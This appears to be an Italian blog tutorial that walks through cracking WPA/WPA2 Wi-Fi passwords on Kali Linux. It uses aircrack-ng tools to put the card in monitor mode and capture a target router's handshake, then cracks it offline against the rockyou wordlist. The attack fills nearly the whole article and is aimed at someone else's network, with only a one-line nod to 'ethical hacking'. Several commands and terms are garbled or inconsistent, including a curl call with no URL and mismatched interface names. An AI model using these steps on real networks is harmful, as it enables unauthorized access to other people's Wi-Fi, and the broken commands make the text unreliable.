Kali Linux WPA e attacchi WPA2

Questo articolo vi darà una panoramica del Wi-Fi e dell’hacking Wi-Fi. Inizieremo con un’introduzione di base del Wi-Fi e dell’hacking.

Introduzione

La fedeltà senza fili, o Wi-Fi, è un tipo di tecnologia utilizzata per fornire connettività a una rete di computer senza un cavo o una connessione cablata. Il Wi-Fi funziona nella gamma da 2,4 Ghz a 5 Ghz e non dovrebbe interferire con telefoni cellulari, radiotrasmissioni, televisione o radio portatili. Il Wi-Fi funziona trasmettendo dati su onde radio tra un dispositivo client e un dispositivo chiamato router. Un router può trasmettere dati a sistemi interni o esterni a Internet. Il Wi-Fi non è né più né meno sicuro di una tradizionale rete cablata, ma è invece un’interfaccia completamente diversa. La cosa più importante da ricordare è che il Wired Equivalent Privacy (WEP) è stato rilasciato nel 1997 ed è facile da violare. WEP può essere violato in pochi minuti o meno. I tuoi dispositivi moderni non funzioneranno con la rete WEP e la maggior parte dei router non la supporta più. Il WEP aggiornato può anche essere violato attraverso metodi di hacking.

Hacking

In parole povere, craccare o penetrare nelle informazioni personali di qualcuno è noto come hacking. Gli hacker possono accedere facilmente al vostro dispositivo personale o computer. Possono decifrare i vostri codici di accesso e accedere alla vostra rete wireless. Possono bypassare la sicurezza della rete wireless ed entrare, non importa quale tipo di crittografia l’utente stia usando.

In genere, se si vuole entrare nella rete wireless di qualcuno, è necessario prima conoscere la crittografia utilizzata. Come detto prima, la rete di tipo WPE non è più sicura da un bel po’ di tempo. In genere può essere penetrata in pochi minuti. Lo stesso vale per la rete WPA se si usa una password debole. Tuttavia, se si usa una password forte, è relativamente sicura, tranne che per WPS7 PIN. Questa è una vulnerabilità della base hardware che molti router usano, permettendo agli hacker di ottenere il pin che fornisce l’accesso completo al router. Questo è di solito un numero di otto cifre scritto nella parte inferiore del router. Puoi ricavare questo numero seguendo i passi seguenti.

Aprire il terminale Kali Linux

Il primo passo è semplicemente aprire il terminale Kali Linux. Per farlo, premete ALT+CTRL+T. Puoi anche premere sull’icona dell’applicazione terminale per aprire il terminale.

Inserisci il comando per l’installazione di aircrack-ng

Il prossimo passo è installare aircrack-ng. Inserisci il seguente comando per farlo:

$ sudo apt-get install aircrack-ng

Inserisci la password per accedere

Inserisci la tua password di root per abilitare l’accesso. Dopo aver inserito la password di accesso, premi il pulsante Invio per continuare.

Installa aircrack-ng

Subito dopo l’accesso, premi il pulsante Y. Questo abiliterà l’installazione di aircrack-ng.

Accendi airmon-ng

Airmon-ng è il software usato per convertire la modalità gestita in modalità monitor. Usa il seguente comando per accendere airmon-ng:

$ airmon-ng

Trova il nome del monitor

Il prossimo passo è trovare il nome del monitor per continuare l’hacking. Puoi visualizzare il nome del monitor nella colonna dell’interfaccia. In alcuni casi, potreste non essere in grado di visualizzare il nome del monitor. Questo errore si verifica se la tua scheda non è supportata.

Iniziare il monitoraggio della rete

Entrare nel seguente comando per iniziare il processo di monitoraggio:

$ airmon-ng start wlan0

Se stai puntando qualche altra rete, allora dovresti sostituire ‘wlan0’ con il nome della rete corretto.

Enable Monitor Mode Interface

Il seguente comando è usato per abilitare l’interfaccia in modalità monitor:

$ iwconfig

Kill Processes that Return Errors

Il tuo sistema potrebbe causare qualche interferenza. Usa il seguente comando per rimuovere questo errore.

$ airmon-ng check kill

Review Monitor Interface

Il prossimo passo è rivedere il nome del monitor. In questo caso, si chiama ‘wlan0mon.’

Osserva i nomi di tutti i router

I nomi di tutti i router disponibili appariranno dopo aver inserito il seguente comando.

$ airodump-ng mon0

Trova il nome del router

Prima dovrai trovare il nome del router specifico che vuoi hackerare.

Assicurati che il router usi la sicurezza WPA o WPA2

Se il nome WPA appare sullo schermo, allora puoi continuare ad hackerare.

Annuncia l’indirizzo MAC e il numero del canale.

Queste sono le informazioni di base sulla rete. Puoi visualizzarle sul lato sinistro della rete.

Monitorare la rete selezionata

Usa il seguente comando per monitorare i dettagli della rete che vuoi hackerare.

$ airodump-ng -c channel –bssid MAC -w /root/Desktop/ mon0

Aspetta l’Handshake

Aspetta finché non vedi scritto ‘WPA HANDSHAKE’ sullo schermo.

Esci dalla finestra premendo CTRL+C. Un file cap apparirà sullo schermo del vostro computer.

Rinomina il file cap

Per vostra comodità, potete modificare il nome del file. Usa il seguente comando per questo scopo:

$ mv ./-01.cap name.cap

Convertire il file in formato hccapx

Puoi convertire il file in formato hccapx facilmente con l’aiuto del convertitore Kali.

Usa il seguente comando per farlo:

$ cap2hccapx.bin nome.cap nome.hccapx

Installa naive-hash-cat

Ora, puoi crackare la password usando questo servizio. Usa il seguente comando per iniziare il cracking.

$ sudo git clone https://github.com/brannondorsey/naive-hashcat
$ cd naive-hash-cat

$ curl -L -o dicts/rockyou.txt

Esegui naive-hash-cat

Per eseguire il servizio naive-hash-cat, inserire il seguente comando:

$ HASH_FILE=nome.hccapx POT_FILE=nome.pot HASH_TYPE=2500 ./naive-hash-cat.sh

Aspetta che la password di rete venga decifrata

Appena la password viene decifrata, sarà menzionata nel file. Questo processo può richiedere mesi o addirittura anni per essere completato. Inserisci il seguente comando quando questo processo viene completato per salvare la password. La password craccata è mostrata nell’ultimo screenshot.

$ aircrack-ng -a2 -b MAC -w rockyou.txt name.cap

Conclusione

Utilizzando Kali Linux e i suoi strumenti, hackerare può diventare facile. Si può facilmente ottenere l’accesso alle password semplicemente seguendo i passi elencati sopra. Speriamo che questo articolo vi aiuti a crackare la password e a diventare un hacker etico.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.